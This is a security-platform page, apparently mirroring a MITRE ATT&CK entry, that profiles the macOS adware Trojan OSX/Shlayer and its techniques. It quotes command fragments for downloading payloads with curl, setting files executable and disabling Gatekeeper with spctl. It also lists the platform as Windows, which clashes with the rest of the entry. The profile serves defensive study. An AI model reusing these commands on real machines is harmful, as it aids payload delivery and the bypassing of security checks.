Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.

OSX/Shlayer

OSX/Shlayer is a Trojan designed to install adware on macOS that was first discovered in 2018.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)
ID: S0402
Associated Software: Crossrider Zshlayer
Type: MALWARE
Platforms: Windows
Version: 1.4
Created: 29 Aug 2019
Last Modified: 30 Aug 2023

Associated Software Descriptions

Name Description
Crossrider (Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018)
Zshlayer (Citation: sentinelone shlayer to zshlayer)

Techniques Used

Domain ID Name Use
Enterprise T1548 .004 Abuse Elevation Control Mechanism: Elevated Execution with Prompt

OSX/Shlayer can escalate privileges to root by asking the user for credentials.(Citation: Carbon Black Shlayer Feb 2019)

Enterprise T1059 .004 Command and Scripting Interpreter: Unix Shell

OSX/Shlayer can use bash scripts to check the macOS version, download payloads, and extract bytes from files. OSX/Shlayer uses the command sh -c tail -c +1381... to extract bytes at an offset from a specified file. OSX/Shlayer uses the curl -fsL "$url" >$tmp_path command to download malicious payloads into a temporary directory.(Citation: Carbon Black Shlayer Feb 2019)(Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)(Citation: objectivesee osx.shlayer apple approved 2020)

Enterprise T1222 .002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification

OSX/Shlayer can use the chmod utility to set a file as executable, such as chmod 777 or chmod +x.(Citation: 20 macOS Common Tools and Techniques)(Citation: Carbon Black Shlayer Feb 2019)(Citation: Shlayer jamf gatekeeper bypass 2021)

Enterprise T1564 .001 Hide Artifacts: Hidden Files and Directories

OSX/Shlayer has executed a .command script from a hidden directory in a mounted DMG.(Citation: Carbon Black Shlayer Feb 2019)

.009 Hide Artifacts: Resource Forking

OSX/Shlayer has used a resource fork to hide a compressed binary file of itself from the terminal, Finder, and potentially evade traditional scanners.(Citation: tau bundlore erika noerenberg 2020)(Citation: sentinellabs resource named fork 2020)

.011 Hide Artifacts: Ignore Process Interrupts

OSX/Shlayer has used the `nohup` command to instruct executed payloads to ignore hangup signals.(Citation: Shlayer jamf gatekeeper bypass 2021)

Enterprise T1036 .005 Masquerading: Match Legitimate Name or Location

OSX/Shlayer can masquerade as a Flash Player update.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)

Enterprise T1553 .001 Subvert Trust Controls: Gatekeeper Bypass

If running with elevated privileges, OSX/Shlayer has used the spctl command to disable Gatekeeper protection for a downloaded file. OSX/Shlayer can also leverage system links pointing to bash scripts in the downloaded DMG file to bypass Gatekeeper, a flaw patched in macOS 11.3 and later versions. OSX/Shlayer has been Notarized by Apple, resulting in successful passing of additional Gatekeeper checks.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Shlayer jamf gatekeeper bypass 2021)(Citation: objectivesee osx.shlayer apple approved 2020)

Enterprise T1204 .002 User Execution: Malicious File

OSX/Shlayer has relied on users mounting and executing a malicious DMG file.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.